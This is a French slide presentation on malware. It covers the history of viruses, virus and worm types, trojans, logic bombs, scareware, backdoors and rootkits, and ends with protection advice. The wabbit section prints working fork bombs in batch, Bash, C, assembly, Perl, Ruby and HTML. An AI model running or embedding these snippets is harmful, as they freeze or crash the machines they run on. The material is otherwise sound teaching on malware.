SlideShare une entreprise Scribd logo

Codes malveillants

Christophe Casalegno
Christophe Casalegno

Présentation sur les codes malveillants : vers, virus, trojans, backdoors, rootkits, etc.

Technologie
1  sur  64
Télécharger pour lire hors ligne
Codes malveillants Worms (vers), virus et bombes logiques Christophe Casalegno Groupe Digital Network
Codes malveillants On désigne sous le terme générique de codes malveillants ou malwares l'ensemble des codes développés dans le but de nuire à un système informatique. Il existe de très nombreuses formes différentes de malware. Parler de code « malicieux » est une er- reur : le terme « malware » se traduirait dans son contexte sous le terme « malveillant » (malicious est un faux ami) Il existe de nombreux malwares tel que : virus , vers (worms), bombes logiques (soft bomb), wabbits, chevaux de troie (trojan horses), portes dérobées (backdoors), spyware, scarewares (rogue), rootkits, dialers, adwares, ou parfois encore la combi- naison de plusieurs de ces formes à la fois.
Codes malveillants LES VIRUS INFORMATIQUES
Codes malveillants LES VIRUS INFORMATIQUES Un peu d'histoire : les origines
Codes malveillants En 1939, John Louis Von Neumann, mathématicien considéré aujourd'hui comme l'un des « pères » des ordinateurs et de l'informatique moderne, publie un article intitulé « Théorie et organisation des automates complexes ». L'homme à qui on doit l'idée de programmes stockés en mémoire et modifiables plutôt que des programmes plus rapides mais « figés » dans les composants matériels évoque alors dans cet article : « la possibilité pour un programme de prendre le contrôle d'un autre programme » Les concepts de programmes autoreproducteurs qu'il y développe alors, en font le père fondateur des théories de virologie informatique.
Codes malveillants En 1959, le magazine « Scientific American » publie un article sur les mécanismes auto-réplicateurs, écrit par L.S. Penrose intitulé : « Self-Reproducing Machines » présenté dans le sommaire du magazine comme traitant de : « Simples unités qui sont construites et qui s'assemblent entre elles pour former des unités plus importantes, qui vont à leur tour faire des copies d'elles-même à partir d'autres unités simples. » Le processus mets en lumière les mêmes mécanismes d'auto- reproduction que ceux des molécules biologiques.  
Codes malveillants En Août 1961, trois jeunes programmeurs des célèbres Bell Laboratories (ATT), Robert Thomas Morris, Douglas McIlory et Victor Vysottsky, développent un jeu appelé Darwin qui se joue sur mainframe IBM 7090 à l'ère des cartes perforées. Le jeu est composé d'un programme « umpire » ainsi que d'une section de la mémoire de l'ordinateur, appelée l'arène dans laquelle 2 programmes ou plus, écrits par les joueurs sont chargés. Les programmes sont écrits en langage machine pour 7090 sur cartes perforées, et peuvent appeler un certain nombre de fonctions fournies par « umpire » dans le but d'occuper d'autres emplacements dans l'arène, de tuer les programmes ennemis et de remplir toute la mémoire libre par des copies d'eux même.
Codes malveillants Un IBM 7090
Codes malveillants Le jeu peut se terminer après une durée prédéfinie ou quand il ne reste plus qu'un seul programme en vie : le joueur qui a écrit le programme qui reste le dernier survivant est déclaré vainqueur. Ces programmes (les combattants) qui s'affrontent dans une arène ont notamment inspirés le film Tron dans lequel un programmeur est projeté à l'aide d'un système de dématérialisation au cœur d'un système informatique. Cependant, le jeu ne perdure pas car Robert Thomas Morris réussi alors à développer un combattant composé de 44 instructions, capable d'adapter sa stratégie et de se protéger, que personne n'arrive à vaincre : de ce fait, plus personne ne développe alors d'adversaire et le jeu est abandonné.
Codes malveillants LES VIRUS INFORMATIQUES Un peu d'histoire : le Core War
Codes malveillants Suite à l'abandon de Darwin, entre 1961 et 1970 va naître le véritable ancêtre des virus : le Core War, appelé également le jeu des programmeurs. A l'instar de Darwin dont il s'inspire, le Corewar consiste à faire s'affronter au minimum 2 programmes, où chacun a pour objectif de détruire le(s) programme(s) adverse(s) et d'occuper toute la mémoire disponible en assurant sa prolifération. L'arène se trouve maintenant au sein de l'espace mémoire d'une machine virtuelle appelée Mars, au sein duquel l'attaquant, qui ignore où sont situés les différents segments de son adversaire, doit le localiser et le détruire.
Codes malveillants Le langage utilisé pour créer ses combattants dans le Corewar, le RedCode est proche de l'assembleur avec toutefois un jeu d'instruction simplifié. Il s'exécute dans une machine virtuelle appelée MARS pour Memory Array Redcode Simulator. Il existe plusieurs versions du langage RedCode dans lesquelles le nombre d'instructions peut varier, mais reste (très) proche d'un assembleur.
Codes malveillants Malgré l'utilisation de ce langage au jeu d'instruction réduit, le Core War intègre dès sa création, la plupart des mécanismes viraux et anti- viraux connus aujourd'hui : réplication, protection, polymorphisme, destruction, réparation, furtivité, injection de code, arrêt d'un processus et même la reconnaissance des signatures si chère à nos antivirus aujourd'hui encore. Le vainqueur est celui qui possède à la fin de la partie, le plus grand nombre de copies actives du programme. Dans le cas ou la partie n'est pas limitée dans le temps, celui qui a réussi à détruire le programme adverse est déclaré vainqueur. Aujourd'hui encore, on continue à jouer au Core War, et des compétitions sont régulièrement organisées dans le monde entier.
Codes malveillants LES VIRUS INFORMATIQUES Définition
Codes malveillants Un virus informatique est un malware spécifique, self-réplicateur, conçu, à l'instar des virus biologiques, pour se propager par le biais de programmes qu'il contamine en ajoutant ou en écrasant un code viral. La machine ou le programme ainsi infecté devient un « hôte » du virus. Le virus peut se propager par l'intermédiaire de tout média de communication, tels que disquettes, cd-rom, clefs usb, emails, etc. Les virus ne sont pas autonomes : ils nécessitent un programme hôte pour se dupliquer et se propager. On dénombre plusieurs dizaines de milliers de virus différents s'attaquant principalement au système Windows de Microsoft mais pas seulement.
Codes malveillants LES VIRUS INFORMATIQUES Un peu d'histoire : le premier virus
Codes malveillants De nombreuses sources sur Internet ou ailleurs citent « Brain » comme étant le premier virus de l'histoire. Celui ci, développé en 1986 par deux frères Pakistanais, les frères Alvi contaminait les disquettes (5" ¼ uniquement) et ne s'attaquait pas aux disques durs. Durant l'infection, Brain se plaçait sur le secteur de démarrage de la disquette puis renommait le nom de volume de la disquette par l'intitulé « (C) Brain ». Brain n'est pas le premier virus recensé : la paternité du premier virus revient à Rich Skrenta, un étudiant américain alors âgé de 15 ans, qui en 1982 crée Elk Cloner... sur Apple II. Elk Cloner envoyait un poème expliquant sa manière de s'auto-répliquer. Rich aurait ainsi réussi à infecter les ordinateurs de ses amis en leur proposant des jeux piratés infectés.
Codes malveillants LES VIRUS INFORMATIQUES Généralités
Codes malveillants Il existe de très nombreuses formes de virus et ces derniers peuvent être écrits dans n'importe quel langage ; cependant, les premiers virus étaient souvent écrits en assembleur. Les virus contaminent généralement un programme en y injectant du code viral. Ce code viral est alors rajouté en début, milieu, ou fin de programme. Il peut également écraser du code existant. Le programme est alors infecté. Dès que le programme est exécuté, il active le code viral, qui va alors infecter d'autres programmes exécutables. L'action du virus ne se limite pas à l'infection : en fonction de certains paramètres, il active généralement un sous programme exécutant une action pré- déterminée, allant de l'affichage d'un message à la destruction de données : On parle alors de l'activation d'une « bombe logique ».
Codes malveillants Les virus informatiques, à l'instar des virus biologiques, ont un cycle de vie. Il est découpé en 7 Phases : 1 - Création : le programmeur écrit le virus 2 - Gestation : l'implantation du virus afin de permettre sa diffusion 3 - Infection, reproduction et prolifération 4 - Activation (réveil et action selon date, signaux et/ou conditions) 5 - Découverte (peut plus rarement être dans les phases précédentes) 6 - Identification et assimilation (mise au points des parades) 7 - Éradication : étape théorique dans laquelle toutes les copies du code viral sont détruites
Codes malveillants Les virus peuvent utiliser ou combiner 4 procédés d'infection à vitesse variable : 1 – Infection lente : infection des fichiers que s'ils sont modifiés ou crées afin de tromper les vérificateurs d'intégrité 2 – Infection normale : infection des programmes au fur et à mesure de leur exécution 3 – Infection rapide : infection non seulement du programme exécuté mais également tout programme ouvert ou présent sur le système 4 – Infection occasionnelle et/ou conditionnelle : l'infection sporadique a plus de chance de passer inaperçue
Codes malveillants LES VIRUS INFORMATIQUES Les virus de boot
Codes malveillants Le virus de boot est un virus spécifique dont le code exécutable est enregistré dans le premier secteur du disque (le secteur de démarrage) également appelé MBR pour Master boot record. On trouve ce secteur sur la plupart des médias tels que les disquettes, les clefs usb, les disques durs ou les CD/DVD-ROM. Ce secteur n'est pas un fichier à proprement parler, mais permet aux systèmes d'exploitation de booter (démarrer). Dans les années 2000, environ 25% des virus étaient de cette nature. La particularité de ce virus, est de n'avoir aucun fichier visible : l'utilisateur a donc tendance à considérer alors le média apparaissant vide comme inoffensif. Certains BIOS de carte mère ont la particularité de pouvoir protéger le MBR du disque dur contre les écritures.
Codes malveillants LES VIRUS INFORMATIQUES Les macrovirus
Codes malveillants Les macrovirus font partie des virus les plus éloignés du virus originel. En effet, ils n'utilisent pas du tout un langage proche du système tel que l'assembleur mais le langage de macro d'un logiciel pour en altérer le fonctionnement (souvent Visual Basic avec Word ou Excel). Ils s'attaquent donc principalement aux fichiers des utilisateurs et n'infectent pas des programmes : très faciles à programmer, ils se répandent par échange de fichiers lorsque le fichier est ouvert. Cependant, aujourd'hui (en général), un logiciel n'exécute les macros contenues dans un document qu'après la confirmation de l'utilisateur, empêchant alors l'exécution du virus. Si le fichier « sain » intègre des macros, l'utilisateur est alors trompé, et le code hostile est lancé. Il pourra alors infecter d'autres fichiers de l'utilisateur qui les répandra à son tour.
Codes malveillants LES VIRUS INFORMATIQUES Les rétrovirus ou virus flibustiers
Codes malveillants On appelle « rétrovirus » ou « virus flibustier » (bounty hunter) un virus informatique ayant la capacité de s'attaquer à un antivirus afin de le rendre inopérant. Plusieurs méthodes peuvent être utilisées par les rétrovirus, tel que la modification les signatures antivirus afin de ne pas être détectés ou encore la simulation d'un comportement humain (le rétrovirus va alors reproduire la manipulation normale de désactivation de l'antivirus : ce dernier croyant avoir à faire à un utilisateur autorisé sera donc désactivé laissant le champs libre au rétrovirus.) Les rétrovirus font parti des virus les plus rares mais également les plus dangereux car ils sont capables de passer plusieurs barrières de protections sans être détectés.
Codes malveillants LES VIRUS INFORMATIQUES Les virus polymorphes
Codes malveillants Comme leur nom l'indique, les virus polymorphes ont la capacité de changer de forme, et donc par la même de tromper les antivirus fonctionnant sur la base de signatures. Afin de réussir cette prouesse, les virus polymorphes cryptent et/ou modifient le code qui les compose à chaque fois qu'ils se reproduisent : de fait, chaque copie du virus est alors différente de la précédente. Pour réussir cette prouesse, le virus polymorphe utilise généralement une routine de chiffrement qui lui permet de modifier certaines de ses instructions au fil des réplications.
Codes malveillants Cependant cette méthode utilisée pour rendre le virus polymorphe, requiert l'utilisation de procédures de chiffrement et de déchiffrement, pour que le code viral puisse s'exécuter. C'est ici que se situe la faille du mécanisme : les procédures de chiffrement/déchiffrement, elles, ne changent pas et constituent alors des éléments invariables. Les anti-virus à base de signature peuvent donc en lieu et place de signatures « classiques », utiliser les procédures spécifiques de cryptage / décryptage dont se sert le virus pour se camoufler, comme signature.
Codes malveillants LES VIRUS INFORMATIQUES Les virus métamorphes
Codes malveillants Les virus métamorphes ressemblent beaucoup aux virus poly- morphes, car ils ont également la capacité de changer de forme, et donc de tromper les antivirus fonctionnant sur la base de signatures. Cependant, contrairement aux méthodes simples de chiffrement et de déchiffrement utilisées par les virus polymorphes, les virus méta- morphes sont capables de modifier leur structure ainsi que les instructions qui les composent. Alors que les différentes formes mutées d'un virus polymorphe partagent le même noyau, et notamment la même fonction de mutation, celles d'un virus métamorphe ont chacune un noyau différent, ce qui le rend beaucoup plus difficile à détecter.
Codes malveillants LES WORMS (VERS) On les confond à tort avec les virus
Codes malveillants Un ver (ou Worm en anglais), est un programme autonome qui assure sa reproduction en contaminant d'autres ordinateurs, généralement via l'exploitation d'une ou plusieurs vulnérabilité(s). Contrairement aux différents virus présentés, le ver n'a pas besoin d'un programme hôte pour se propager : une connexion réseau lui suffit. Les vers ont une vitesse de propagation très élevée car ils n'ont pas besoin d'une action humaine (lancement de programme par exemple) pour être activés. Ils peuvent donc se répandre sur des milliers de machines vulnérables en à peine quelques minutes. A ce titre, les vers peuvent se révéler beaucoup plus dangereux que les virus.
Codes malveillants Les vers peuvent embarquer d'autres programmes ou sous- programmes qui seront alors installés sur la cible, comme des bombes logiques, des virus ou d'autres malwares (backdoors, rootkit, keylogger, sniffers, etc...) Les vers peuvent également utiliser des techniques présentes dans les rétrovirus (virus flibustiers), les virus polymorphes ou les virus métamorphes pour se camoufler ou désactiver certains mécanismes de protection. Enfin ils peuvent également analyser la cible et s'y adapter en téléchargeant des instructions ou des programmes complémentaires au travers d'internet (exploits, virus, etc...).
Codes malveillants Le premier ver informatique connu, parfois appelé Rogue ou Great worm, est le ver de Morris. Il a été écrit par Robert Tappan Morris, fils de Robert Morris Sr., cryptographe et spécialiste en sécurité informatique qui travaillait notamment au NCSC (National Computer Security Center), une branche de la NSA (National Security Agency). Le 2 novembre 1988, Robert Tappan Morris lance son ver à partir du MIT. Conçu pour être inoffensif, des erreurs dans son code l'ont rendu plus dangereux, le rendant capable d'infecter plusieurs fois un système, jusqu'à rendre ce dernier inutilisable. Le ver Morris qui infectait les machines VAX, exploitait deux vulnérabilités (sendmail et fingerd) combinées à une tentative de bruteforce des mots de passe.
Codes malveillants Morris fut ainsi la première personne à être condamnée en vertu du Computer Fraud and Abuse Act de 1986. Ainsi après être allé en appel il fût condamné à 3 ans de probation, 400 heures de travaux communautaires et à une amende de plus de 10.000$. C'est suite à ce ver que fut créé le premier CERT (Computer Emergency Response Team), centre d'alerte et de réaction aux attaques informatiques dont le rôle est à la fois centralisateur, mais qui s'occupe également du traitement des alertes, de la réaction à apporter, de l'échange d'information avec les autres CERTs, de l'établissement et de la maintenance d'une base de données de vulnérabilités ainsi que de la prévention via la diffusion d'informations sur les précautions à prendre pour limiter les risques d'incident.
Codes malveillants Code Red est un exemple intéressant de worm (ver) s'attaquant aux systèmes serveurs Microsoft Windows. Il a été crée en 2001. Code Red (à ne pas confondre avec le langage Red Code du CoreWar) exploite une vulnérabilité des serveurs Web IIS 4.0 et 5.0 de Microsoft. Il a été conçu dans un objectif précis, à savoir attaquer le serveur web de la maison blanche. Lorsque la machine est infectée elle lance une attaque de type Déni de Service (DoS) contre ce dernier.
Codes malveillants Vers évolués récents ; Stuxnet, Flame... Points communs : sur-médiatisés Stuxnet a été écrit spécifiquement pour s'attaquer aux systèmes SCADA en les reprogrammant et en camouflant les modifications qu'il a effectué. Il s'attaque notamment aux API produites par Siemens et utilisées au sein des centrales nucléaires et hydro-électriques. On trouve également ces systèmes dans les usines de distribution d'eau potable ou encore dans la gestion des oléoducs.
Codes malveillants Vers évolués récents ; Stuxnet, Flame... Points communs : sur-médiatisés Flame s'attaque aux systèmes d'exploitation Windows de Microsoft. Bien que l'on présente la plupart de ses caractéristiques comme révolutionnaires, il n'en est rien : la plupart de ses capacités d'espionnage existent depuis plus d'une décennie avant sa sortie (interception des emails, des conversations en ligne, etc.)
Codes malveillants Vers évolués récents ; Stuxnet, Flame... Points communs : sur-médiatisés Le mythe : une légende urbaine crée par la presse et certaines personnes en mal de reconnaissance médiatiques prétendent que seul des services tel que la CIA ou le Mossad seraient capables de telles productions. Réaliser de tels outils est parfaitement à la portée de petites équipées privées motivées : nul besoin des moyens d'un état pour développer de tels systèmes.
Codes malveillants De manière générale, il est fort probable que les vers vont intégrer de plus en plus de technologies qui étaient propres aux virus (métamorphisme, rétroviralité) en y ajoutant la capacité d'analyser une cible, embarquant un compilateur évolutif ainsi que la possibilité de se connecter à des ressources situées sur internet pour télécharger le code hostile nécessaire à l'exploitation des vulnérabilités détectées. L'ensemble des connaissances permettant ce type de réalisation est accessible à n'importe quel développeur. Il est également possible de créer des vers « primaires » en shell (unix ou windows) intégrant les mécanismes d'analyse / téléchargement / exploitation en fonction de la cible.
Codes malveillants LES CHEVAUX DE TROIE Le maillon faible, c'est vous
Codes malveillants Comme son nom à la référence mythologique l'indique, un cheval de Troie ou Trojan Horse est un programme ou un sous-programme camouflé sous le nom ou au sein d'un programme légitime. Par définition, il ne cache pas forcément une fonction de type malware : un jeu caché et appelé via une combinaison de touche secrète dans un logiciel bureautique, est aussi un cheval de Troie. Parfois, seul le nom du programme laisse penser que le programme est inoffensif : Bien que répertorié sous ce nom il ne s'agit pas exactement du fonctionnement d'un cheval de Troie : c'est uniquement sous un faux nom qu'il se cache alors.
Codes malveillants Le Cheval de troie est généralement intégré au sein d'un programme de type utilitaire ou application bureautique. Il s'agit alors de sous-programmes embarqués eux même au sein d' un programme légitime. Lors du lancement du programme légitime, ou encore lors d'une action particulière, le sous-programme caché est alors exécuté. Les chevaux de troie sont le plus souvent utilisés pour camoufler des programmes malveillants : backdoors, bombes logiques, keyloggers, spywares ou autres outils permettant de prendre le contrôle du système ou d'obtenir des informations réputées confidentielles.
Codes malveillants LES BOMBES LOGIQUES Un danger bien réel pour vos données
Codes malveillants Les bombes logiques parfois également appelées « soft bombs » ou bombes logicielles, sont généralement des dispositifs massivement destructeurs de données, programmés pour se déclencher lors d'une ou plusieurs conditions déterminées. Ces conditions sont souvent : un signal, une date, une heure, ou encore une action attendue d'un utilisateur ou d'un programme du système (ouverture d'un menu particulier, clic, séquence de lettres ou de chiffres, lancement d'un logiciel, accès à un fichier particulier ou à une URL sur Internet...). Parfois elles peuvent effectuer d'autres actions comme crypter les données du système d'information ou de la machine qui la contient (crypto bombe).
Codes malveillants Certaines bombes logiques peuvent également être déclenchées à distance par un email, ou tout autre protocole réseau (bombe liée à la pile TCP/IP de l'OS qui se déclenchera lorsque le champs data d'un paquet TCP/IP contiendra une information particulière) Les bombes logiques sont parfois utilisées comme telle. Cependant, de nombreux virus, vers et autres malwares embarquent parfois une ou plusieurs bombes logiques dans leur code. Les bombes logiques sont fréquemment utilisées pour soutirer de l'argent à une cible, de la société au particulier, via du chantage : la société doit payer dans les prochaines heures pour ne pas perdre toutes ses données, le particulier pour récupérer ses documents cryptés, etc.
Codes malveillants WABBIT
Codes malveillants Le wabbit est un malware particulier qui à l'instar des virus a pour principale caractéristique l'autoréplication. La comparaison s'arrête cependant ici car contrairement aux virus il n'infecte ni les programmes, ni les documents, ni le secteur de démarrage. Contrairement aux vers, il ne se propage pas au travers des réseaux. Une fork bomb par exemple (création d'un nombre très important de processus dans le bug de saturer toute la mémoire disponible ainsi que le CPU disponible) est un wabbit
Codes malveillants Quelques exemples de fork bomb : Sous Windows dans un fichier batch : %0|%0 Ou encore : :s start %0 goto :s Sous Unix en shell Bash : :(){ :|:& };: :() définit une fonction nommée :. { :|:& } est le corps de la fonction. Dans celui-ci, la fonction s'appelle elle-même (:), puis redirige la sortie à l'aide d'un pipe (|) sur l'entrée de la même fonction : et cache le processus en fond avec &. La fonction, ensuite appelée avec :, s'appelle récursivement à l'infini.
Codes malveillants Quelques exemples de fork bomb : En langage C #include <unistd.h> int main(void) { while(1) { /* ici on peut ajouter un malloc pour utiliser plus de ressources */ fork(); } return 0; }
Codes malveillants Quelques exemples de fork bomb : En assembleur x86 : entry start start: push 0x2 pop eax int 0x80 jmp start En perl : perl -e "fork while fork" & En Ruby : loop { fork }
Codes malveillants Quelques exemples de fork bomb : Tout simplement en HTML : <html> <script type="text/javascript"> function open_target_blank() { window.open(window.location); } window.onload = open_target_blank(); </script> <body> </body> </html>
Codes malveillants LES ROGUES OU SCAREWARE
Codes malveillants Un rogue, ou scareware est en quelque sorte une exploitation automatique du social engineering : En se promenant sur un site internet, un utilisateur recevra une alerte lui indiquant que sa machine est infectée par un logiciel malveillant. On lui indique ensuite généralement un logiciel qu'il peut installer pour nettoyer son ordinateur. Souvent, on demande à l'utilisateur de payer une licence de quelques dizaines de dollars : non seulement l'utilisateur s'est infecté lui même mais en plus il a payé pour le faire.
Codes malveillants LES BACKDOORS ET ROOTKITS Les portes dérobées
Codes malveillants On appelle backdoor, une fonctionnalité cachée, généralement par le son concepteur, dans un programme ou un sous-programme, permettant de donner un accès privilégié, généralement administrateur, au software concerné. Une backdoor peut également être introduite par un tiers, via la modification d'un logiciel. Généralement, les backdoors permettent de contourner les mesures d'authentifications, souvent y compris des mesures rajoutées après sa mise en place. De nombreuses backdoors ont été introduites par le concepteur du software la contenant, notamment afin de permettre la maintenance du software en cas de la perte des accès par le client, ou bien afin de pouvoir désactiver ce dernier en cas de contentieux.
Codes malveillants Lorsque la backdoor permet à la fois de dissimuler une activité et de pérenniser un accès administrateur on la désigne généralement sous le terme de rootkit. Certaines backdoors vont jusqu'à s'attaquer au noyau par l'intermédiaire de modules résidents tel que lkm (linux kernel module) par exemple, leur permettant d'intercepter tous les appels y compris de commandes « saines » et non modifiées. Même avec un nettoyage approfondi, il est difficile d'être certain à 100 % que le système est à nouveau « sain », et il reste préférable de le réinstaller complètement (sans oublier le bootloader)
Codes malveillants Plusieurs backdoors Windows ont connu leur heure de gloire, y compris auprès des administrateurs, car certaines offraient des possibilité qui n'existaient pas dans les outils d'administration standard. Back Orifice, crée en août 1998 par la team « Cult of the Dead Cow (cDc ou en Français le Culte de la vache morte) permet notamment d'accéder à l'ensemble des informations système, d'afficher le contenu d'un fichier à distance, de lancer un serveur http intégré, ou encore chose impossible d'origine sous Windows 95/98 de lister l'ensemble des processus en cours d'exécution. Il permet également d'accéder à la base de registre, d'afficher une boite du dialogue ou de voir l’ensemble des mots de passe stockés sur la machine.
Codes malveillants Subseven quant à lui, développé également à la fin des année 90, permet dans une interface graphique très simple coté « client », et après exécution du binaire par l'hôte, souvent au travers d'une méthode de type cheval de troie, permet de : Scanner des ips, être notifié automatiquement de la connexion via ICQ ou IRC, uploader et exécuter des fichiers, les effacer, déclencher l'impression sur l'hôte, afficher une image, ouvrir ou fermer le lecteur CD, activer la webcam et regarde ce qui se passe, inverser l'écran, voir le bureau et en prendre le contrôle, enregistrer tous les mots de passe utilisés, intéragir / dialoguer avec l'utilisateur de l'hôte, etc.
Codes malveillants
Codes malveillants COMMENT SE PROTEGER ?
Codes Malveillants - Maintenez vos applications et OS à jour, faites de la veille. - Utilisez un firewall et un antivirus - Évitez l'ouverture de pièces jointes suspectes ou inutiles - Évitez d'ouvrir un partage sans mot de passe solide - Utilisez 2 antivirus différents : pour les serveurs et les clients - Ne cliquez pas sur les liens que vous recevez par email - Faites attention aux Hoax concernant les virus...

Recommandé

Rapport de projet de fin d'année
Rapport de projet de fin d'année Rapport de projet de fin d'année
Rapport de projet de fin d'année kaies Labiedh
 
Rapport du Projet de Fin d'année Génie informatique
Rapport du Projet de Fin d'année Génie informatique Rapport du Projet de Fin d'année Génie informatique
Rapport du Projet de Fin d'année Génie informatique ayoub daoudi
 
Conception et développement d&rsquo;une place de marché B2C
Conception et développement d&rsquo;une place de marché B2CConception et développement d&rsquo;une place de marché B2C
Conception et développement d&rsquo;une place de marché B2CNassim Bahri
 
Mise en place d’une solution de tests de sécurité pour les passerelles réside...
Mise en place d’une solution de tests de sécurité pour les passerelles réside...Mise en place d’une solution de tests de sécurité pour les passerelles réside...
Mise en place d’une solution de tests de sécurité pour les passerelles réside...Salmen HITANA
 
Guide rapport de stage licence
Guide rapport de stage licence Guide rapport de stage licence
Guide rapport de stage licence Fadhel El Fahem
 
Plan d'études_INSAT_2022_2023.pdf
Plan d'études_INSAT_2022_2023.pdfPlan d'études_INSAT_2022_2023.pdf
Plan d'études_INSAT_2022_2023.pdfLilia Sfaxi
 
cyberedu_module_1_notions_de_base.pptx
cyberedu_module_1_notions_de_base.pptxcyberedu_module_1_notions_de_base.pptx
cyberedu_module_1_notions_de_base.pptxKhalil BOUKRI
 
Mise en place d'une solution de détection des pirates et des malwares dans le...
Mise en place d'une solution de détection des pirates et des malwares dans le...Mise en place d'une solution de détection des pirates et des malwares dans le...
Mise en place d'une solution de détection des pirates et des malwares dans le...Mohamed Ben Bouzid
 

Recommandé

Rapport de projet de fin d'année
Rapport de projet de fin d'année Rapport de projet de fin d'année
Rapport de projet de fin d'année kaies Labiedh
 
Rapport du Projet de Fin d'année Génie informatique
Rapport du Projet de Fin d'année Génie informatique Rapport du Projet de Fin d'année Génie informatique
Rapport du Projet de Fin d'année Génie informatique ayoub daoudi
 
Conception et développement d&rsquo;une place de marché B2C
Conception et développement d&rsquo;une place de marché B2CConception et développement d&rsquo;une place de marché B2C
Conception et développement d&rsquo;une place de marché B2CNassim Bahri
 
Mise en place d’une solution de tests de sécurité pour les passerelles réside...
Mise en place d’une solution de tests de sécurité pour les passerelles réside...Mise en place d’une solution de tests de sécurité pour les passerelles réside...
Mise en place d’une solution de tests de sécurité pour les passerelles réside...Salmen HITANA
 
Guide rapport de stage licence
Guide rapport de stage licence Guide rapport de stage licence
Guide rapport de stage licence Fadhel El Fahem
 
Plan d'études_INSAT_2022_2023.pdf
Plan d'études_INSAT_2022_2023.pdfPlan d'études_INSAT_2022_2023.pdf
Plan d'études_INSAT_2022_2023.pdfLilia Sfaxi
 
cyberedu_module_1_notions_de_base.pptx
cyberedu_module_1_notions_de_base.pptxcyberedu_module_1_notions_de_base.pptx
cyberedu_module_1_notions_de_base.pptxKhalil BOUKRI
 
Mise en place d'une solution de détection des pirates et des malwares dans le...
Mise en place d'une solution de détection des pirates et des malwares dans le...Mise en place d'une solution de détection des pirates et des malwares dans le...
Mise en place d'une solution de détection des pirates et des malwares dans le...Mohamed Ben Bouzid
 
Le Développement d’une Application Web
Le Développement d’une Application WebLe Développement d’une Application Web
Le Développement d’une Application WebMalick Mbaye
 
Responsabilite du transporteur transport multimodal
Responsabilite du transporteur transport multimodal Responsabilite du transporteur transport multimodal
Responsabilite du transporteur transport multimodalRabah HELAL
 
Uml & cas d'utilisation
Uml & cas d'utilisationUml & cas d'utilisation
Uml & cas d'utilisationMireille Blay-Fornarino
 
Rapport PFE: Gestion de Parc Informatique
Rapport PFE: Gestion de Parc InformatiqueRapport PFE: Gestion de Parc Informatique
Rapport PFE: Gestion de Parc InformatiqueEric Maxime
 
Zoom sur le Métier de Développeur
Zoom sur le Métier de DéveloppeurZoom sur le Métier de Développeur
Zoom sur le Métier de DéveloppeurANAPEC
 
Serveur ftp
Serveur ftpServeur ftp
Serveur ftpSam Rich
 
Rapport de stage de fin d'etude l3 angelito & hasina
Rapport de stage de fin d'etude l3 angelito & hasinaRapport de stage de fin d'etude l3 angelito & hasina
Rapport de stage de fin d'etude l3 angelito & hasinaAngelito Mandimbihasina
 
Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...
Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...
Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...Nawres Farhat
 
RapportPFE_IngenieurInformatique_ESPRIT
RapportPFE_IngenieurInformatique_ESPRITRapportPFE_IngenieurInformatique_ESPRIT
RapportPFE_IngenieurInformatique_ESPRITLina Meddeb
 
tutoriel sur la mise en place d'une politique de sécurité informatique
tutoriel sur la mise en place d'une politique de sécurité informatiquetutoriel sur la mise en place d'une politique de sécurité informatique
tutoriel sur la mise en place d'une politique de sécurité informatiqueManuel Cédric EBODE MBALLA
 
formation istqb.pdf
formation istqb.pdfformation istqb.pdf
formation istqb.pdfmido04
 
Presentation du socle technique Java open source Scub Foundation
Presentation du socle technique Java open source Scub FoundationPresentation du socle technique Java open source Scub Foundation
Presentation du socle technique Java open source Scub FoundationStéphane Traumat
 
Rapport de projet de fin d"études
Rapport de projet de fin d"étudesRapport de projet de fin d"études
Rapport de projet de fin d"étudesMohamed Boubaya
 
Introduction cyber securite 2016
Introduction cyber securite 2016Introduction cyber securite 2016
Introduction cyber securite 2016PRONETIS
 
Diagramme d'activité en UML
Diagramme d'activité en UMLDiagramme d'activité en UML
Diagramme d'activité en UMLMireille Blay-Fornarino
 
IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018
IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018
IPTECH CATALOGUE DES SUJETS PFE POUR L'ANNÉE 2018. WATCOM
 
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...
Rapport PFE BIAT Conception et mise en place d’une plate-forme de gestion des...Yasmine Lachheb
 
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )Saadaoui Marwen
 
أساسيات أمن المعلومات
أساسيات أمن المعلوماتأساسيات أمن المعلومات
أساسيات أمن المعلوماتMohammed Almeshekah
 
La traçabilité logistique
La traçabilité logistiqueLa traçabilité logistique
La traçabilité logistiqueIlham Yachaoui
 
Programmation Android - 00 - Présentation
Programmation Android - 00 - PrésentationProgrammation Android - 00 - Présentation
Programmation Android - 00 - PrésentationYann Caron
 
Devoxx 2015, ionic chat
Devoxx 2015, ionic chatDevoxx 2015, ionic chat
Devoxx 2015, ionic chatLoïc Knuchel
 

Contenu connexe

Tendances

Le Développement d’une Application Web
Le Développement d’une Application WebLe Développement d’une Application Web
Le Développement d’une Application WebMalick Mbaye
 
Responsabilite du transporteur transport multimodal
Responsabilite du transporteur transport multimodal Responsabilite du transporteur transport multimodal
Responsabilite du transporteur transport multimodalRabah HELAL
 
Rapport PFE: Gestion de Parc Informatique
Rapport PFE: Gestion de Parc InformatiqueRapport PFE: Gestion de Parc Informatique
Rapport PFE: Gestion de Parc InformatiqueEric Maxime
 
Zoom sur le Métier de Développeur
Zoom sur le Métier de DéveloppeurZoom sur le Métier de Développeur
Zoom sur le Métier de DéveloppeurANAPEC
 
Serveur ftp
Serveur ftpServeur ftp
Serveur ftpSam Rich
 
Rapport de stage de fin d'etude l3 angelito & hasina
Rapport de stage de fin d'etude l3 angelito & hasinaRapport de stage de fin d'etude l3 angelito & hasina
Rapport de stage de fin d'etude l3 angelito & hasinaAngelito Mandimbihasina
 
Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...
Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...Rapport pfe- Refonte et déploiement d’une solution de messagerie en utilisant...
